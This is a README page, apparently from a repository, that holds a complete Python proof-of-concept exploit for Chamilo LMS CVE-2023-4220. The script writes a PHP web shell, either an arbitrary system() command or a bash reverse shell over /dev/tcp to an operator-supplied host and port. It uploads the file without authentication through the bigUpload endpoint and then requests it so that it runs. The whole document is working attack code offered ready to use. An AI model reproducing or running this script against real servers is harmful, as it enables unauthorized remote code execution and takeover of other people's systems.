README.md
Rendering markdown...
import argparse
import requests
import os
# Colors for terminal output
RED = '\033[0;31m'
GREEN = '\033[0;32m'
YELLOW = '\033[0;33m'
RESET = '\033[0m'
# File name for the reverse shell script
rev_shell_filename = "shell.php"
# Parse command-line options
parser = argparse.ArgumentParser(description='POC for Chamilo LMS CVE-2023-4220')
parser.add_argument('-u', '--url', required=True, help='Website where you want to upload the payload: http://host:port')
parser.add_argument('-c', '--command', help='Command to execute on server')
parser.add_argument('-lhost', '--localIP', help='Local IP for reverse shell')
parser.add_argument('-lport', '--localPort', help='Local port for reverse shell')
args = parser.parse_args()
host_url = args.url
command_to_execute = args.command
local_ip = args.localIP
local_port = args.localPort
# Create the PHP reverse shell or command execution script
with open(rev_shell_filename, "w", encoding='utf-8') as file:
if command_to_execute:
shell_content = f'<?php system("{command_to_execute}"); ?>'
else:
shell_content = f'<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1\'"); ?>'
file.write(shell_content)
# Upload the PHP script to the target server
try:
with open(rev_shell_filename, 'rb') as file:
files = {'bigUploadFile': file}
upload_url = f"{host_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
response = requests.post(upload_url, files=files)
response.raise_for_status()
print(f"{GREEN}File {rev_shell_filename} uploaded successfully.{RESET}")
except requests.exceptions.RequestException as e:
print(f"{RED}File upload failed: {e}{RESET}")
exit(1)
# Provide information for reverse shell
if not command_to_execute:
print(f"{YELLOW}You will get the shell, you can stop this script now.{RESET}")
# Execute the uploaded script or get the result
result_url = f"{host_url}/main/inc/lib/javascript/bigupload/files/{rev_shell_filename}"
response = requests.get(result_url)
if command_to_execute:
print(f"{GREEN}{response.text}{RESET}")